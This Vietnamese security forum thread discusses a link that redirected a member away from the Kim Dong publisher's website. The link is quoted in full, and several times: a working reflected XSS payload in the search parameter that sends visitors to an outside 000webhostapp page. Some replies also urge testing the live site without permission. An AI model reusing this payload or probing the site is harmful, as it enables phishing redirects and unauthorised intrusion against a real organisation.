Mọi người cho em hỏi có phải website này bị hack không ạ

nothing_1122

Member
13/05/2020
0
15 bài viết
Mọi người cho em hỏi có phải website này bị hack không ạ
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Khả năng là trang web có lỗi redirect hoặc XSS
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Có người lạ gửi cho em đường link này xong em bấm vô thì nó lại chuyển hưởng sang trang khác ạ mọi người xem giúp em với
link website: https://www.nxbkimdong.com.vn/tim-kiem?title=<script>window.location.href ="http://c-l-a-y-f-o-r-u-m.000webhostapp.com/"</script>&fbclid=IwAR0Sx1lPUSUcW2CmPKsL89YgwKZbwIdk53Bb5j5ltxLQrEN1iN3N9DDlQMA
Trang web của NXB Kim Đồng không bị hack. Trong link có dấu hiệu giúp tấn công XSS.
Chi tiết link khi bạn click ....com.vn/tim-kiem?title=<script>window.location.href ="http://c-l-a-y-f-o-r-u-m.000webhostapp.com/"</script>&amp;fbclid=IwAR0Sx1lPUSUcW2CmPKsL89YgwKZbwIdk53Bb5j5ltxLQrEN1iN3N9DDlQMA
Khi click link, một đoạn script (<script>window.location.href = "c-l-a-y-f-o-r-u-m.000webhostapp.com"</script>) sẽ được add vào source web và web sẽ thực hiện đoạn script này và chuyển hướng sang trang c-l-a-y-f-o-r-u-m.000webhostapp.com.
 
Comment
Trang web của NXB Kim Đồng không bị hack. Trong link có dấu hiệu giúp tấn công XSS.
Chi tiết link khi bạn click ....com.vn/tim-kiem?title=<script>window.location.href ="http://c-l-a-y-f-o-r-u-m.000webhostapp.com/"</script>&amp;fbclid=IwAR0Sx1lPUSUcW2CmPKsL89YgwKZbwIdk53Bb5j5ltxLQrEN1iN3N9DDlQMA
Khi click link, một đoạn script (<script>window.location.href = "c-l-a-y-f-o-r-u-m.000webhostapp.com"</script>) sẽ được add vào source web và web sẽ thực hiện đoạn script này và chuyển hướng sang trang c-l-a-y-f-o-r-u-m.000webhostapp.com.
vậy là website ko bị deface :)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Trang web của NXB Kim Đồng không bị hack. Trong link có dấu hiệu giúp tấn công XSS.
Chi tiết link khi bạn click ....com.vn/tim-kiem?title=<script>window.location.href ="http://c-l-a-y-f-o-r-u-m.000webhostapp.com/"</script>&amp;fbclid=IwAR0Sx1lPUSUcW2CmPKsL89YgwKZbwIdk53Bb5j5ltxLQrEN1iN3N9DDlQMA
Khi click link, một đoạn script (<script>window.location.href = "c-l-a-y-f-o-r-u-m.000webhostapp.com"</script>) sẽ được add vào source web và web sẽ thực hiện đoạn script này và chuyển hướng sang trang c-l-a-y-f-o-r-u-m.000webhostapp.com.
cho em hỏi nếu file "web.config" và file "hta.access" truy cập được thì tin tặc làm gì để hack web ạ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Các tấn công liên quan đến file htaccess bạn có thể xem tại đây.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: nothing_1122
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Có ai nhắn cho NXB Kim Đồng chưa vậy?
Nhắn để họ sửa kìa.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
họ ko quan tâm luôn anh ơi :'(
Để xem thử còn exploit nào ko.
Nếu họ ko quan tâm thì mình thử đăng lên bug bounty xem.
P/s:Nếu ô searching có XSS thì dễ là ô tên đăng nhập trong mục đăng kí cũng có...
 
Chỉnh sửa lần cuối:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mọi người thử pen trang của KĐ đi.
Đến khi tìm ra hết rồi báo luôn một mẻ.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên